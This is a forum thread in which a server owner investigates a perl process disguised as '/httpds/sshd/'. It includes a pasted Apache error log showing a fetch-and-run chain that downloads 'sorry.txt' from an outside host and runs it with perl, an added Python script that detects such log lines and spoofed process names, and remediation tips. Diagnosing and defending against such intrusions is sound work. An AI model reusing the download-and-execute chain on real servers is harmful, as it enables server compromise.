LinuxQuestions.org


neo_fox 01-09-2008 11:24 AM

Perl eating CPU Time - what is "/httpds/sshd/"
 
Hi All,

For a few weeks my server has been slooooowing down sometimes, and when I log in via SSH I can see that the perl process is eating CPU time. The only solution is to kill those processes one after another (because they resurrect ;) )

I see that this process has been started by Apache, so I'm afraid that it could be a hack attempt.

Code:

# top
13599 apache    25  0  5088 2868 1200 R 97.1  0.3  27:36.12 perl

Code:

#ps aux | grep 13599
apache  13599 52.0  0.2  5088  2868 ?        R    14:27  27:44 /httpds/sshd/

Could someone tell me what "/httpds/sshd/" is?

I use ssh and sftp instantly.
I have already disabled the apache perl module.
The OS is: Fedora Core 5 2.6.20-1.2320.fc5
Apache: 2.2.2
PHP: 5.1.6

Any help is very appreciated :-)

Best Regards,
Neo

trickykid 01-09-2008 11:29 AM

perl doesn't run like that unless a user most likely runs a script, etc. Sounds to me like you possibly got hacked. I'd say you may want to unplug this machine from the network to do a full investigation. Unless you have something with apache that kicks off a perl script/program, etc.

neo_fox 01-09-2008 01:54 PM

The problem is I cannot unplug this machine because this is a leased root server :confused:

I saw that webmin also starts some perl processes, but I think they are not causing this problem.

How can I find out who starts these processes and what "/httpds/sshd/" is?

I'm trying to be very careful with this server. No root access, complicated password, I check the logfiles regularly but I didn't see anything suspect :(

trickykid 01-09-2008 05:11 PM

Leased root server? I'd suggest asking the people you lease it from then. But seriously, if there are processes you don't know about or how they start and you are in full control of this server, better start asking questions to your provider.

httpds/sshd sounds to me like some type of web enabled ssh program I would guess. That's why I'd suggest asking the lease provider. Most likely this server of yours could just be a virtual server and they might have programs running to monitor, applications you may not want running, etc.

neo_fox 01-09-2008 11:24 PM

I cannot ask my provider because this is a root server. So this means I have a physical server in their server room. But this is my server, it's not virtual. So this means that they did not install any programs there, and the only support is for hardware or network connection.

Regards,
Neo

neo_fox 01-10-2008 01:45 AM

It seems to be a hack attempt. I saw this in my general apache error logfile:

Code:


  % Total    % Received % Xferd  Average Speed  Time    Time    Time  Current
                                Dload  Upload  Total  Spent    Left  Speed
100 13685  100 13685    0    0  2267      0  0:00:06  0:00:06 --:--:-- 35000
sh: line 1: 13589 Killed                  perl sorry.txt
--14:27:07--  http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'

    0K .......... ...                                        100% 37.4K=0.4s

14:27:09 (37.4 KB/s) - `sorry.txt' saved [13685/13685]

sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
--15:20:31--  http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'

    0K .......... ...                                        100% 34.6K=0.4s

15:20:33 (34.6 KB/s) - `sorry.txt' saved [13685/13685]

  % Total    % Received % Xferd  Average Speed  Time    Time    Time  Current
                                Dload  Upload  Total  Spent    Left  Speed
100 13685  100 13685    0    0  16702      0 --:--:-- --:--:-- --:--:-- 32962
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
Can't open perl script "sorry.txt": No such file or directory
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [error] [client 208.186.169.183] File does not exist: /var/www/sigsiu/html/ebay/zenphoto
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.

I think that it does not work. But how is it possible if the apache perl module is disabled?
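As an added example (not code from the thread or from any of the posters), here is a small Python triage script that automates the two checks the posts above rely on: flagging error_log lines that were not written by Apache itself (the wget/curl/perl output shown in the log excerpt), and comparing the kernel's name for a process (top's COMMAND column, /proc/PID/comm) with what the process claims in its command line (ps's output, /proc/PID/cmdline), so a process that calls itself "/httpds/sshd/" while the kernel knows it as perl stands out. The sample log is constructed from the excerpt; scan_proc reads /proc and therefore only runs on Linux.

```python
import os
import re

# Apache's own error_log entries start with a bracketed timestamp; anything else in that
# file is stdout/stderr of a child process, e.g. a shell spawned through a web application.
APACHE_LINE = re.compile(r"^\[\w{3} \w{3} \d{2} ")
# Traces of a fetch-and-run chain: wget/curl/fetch output, perl errors, shell errors.
SHELL_NOISE = re.compile(r"^sh: |^--\d{2}:\d{2}:\d{2}--\s+https?://|Saving to: |Can't open perl script|% Total\s+% Received")

# Constructed sample, modelled on the error_log excerpt posted in the thread.
SAMPLE_ERROR_LOG = """\
sh: line 1: 13589 Killed                  perl sorry.txt
--14:27:07--  http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Saving to: `sorry.txt'
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
""".splitlines()

def shell_noise_lines(lines):
    """(lineno, text) of non-Apache lines that look like child-process output."""
    return [(n, l.rstrip()) for n, l in enumerate(lines, 1)
            if l.strip() and not APACHE_LINE.match(l) and SHELL_NOISE.search(l)]

def argv_mismatch(comm, cmdline):
    """True when the kernel's executable name (top's COMMAND, /proc/<pid>/comm) matches no
    word of argv (ps's command line, /proc/<pid>/cmdline), i.e. the process hides behind a
    fake argv[0] such as "/httpds/sshd/". Interpreter+script pairs count as normal."""
    argv = [a for a in re.split(r"[\x00\s]+", cmdline) if a]
    if not argv:                       # kernel threads have an empty cmdline
        return False
    names = {os.path.basename(a.rstrip("/")) for a in argv}
    return not any(n[:15] == comm for n in names)   # comm is truncated to 15 chars

def scan_proc(uid):
    """Live triage on Linux: processes owned by uid (e.g. pwd.getpwnam("apache").pw_uid)
    whose command line does not match their executable name."""
    found = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            if os.stat(f"/proc/{pid}").st_uid != uid:
                continue
            comm = open(f"/proc/{pid}/comm").read().strip()
            cmdline = open(f"/proc/{pid}/cmdline").read()
        except OSError:                # process exited or not readable
            continue
        if argv_mismatch(comm, cmdline):
            found.append((int(pid), comm, cmdline.replace("\x00", " ").strip()))
    return found
```

A legitimate mismatch is still possible (setproctitle-style daemons rename themselves), so treat a hit as something to inspect via /proc/PID/exe and /proc/PID/cwd, not as proof by itself.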

Promethyl 02-02-2008 08:29 AM

Well, I would start by renaming perl to perl2 and killing the processes. (Temporary.)

Then, put in hosts entries for the IRC servers it uses, so it can't communicate out.

It has a list of ports it scans, I would also AFP block any of those which aren't in use legitimately.

A lot of it is in Spanish, so it's unclear.

Now, I would look for how it got there in the first place. Uploaded by a user? That part I'm shaky on.
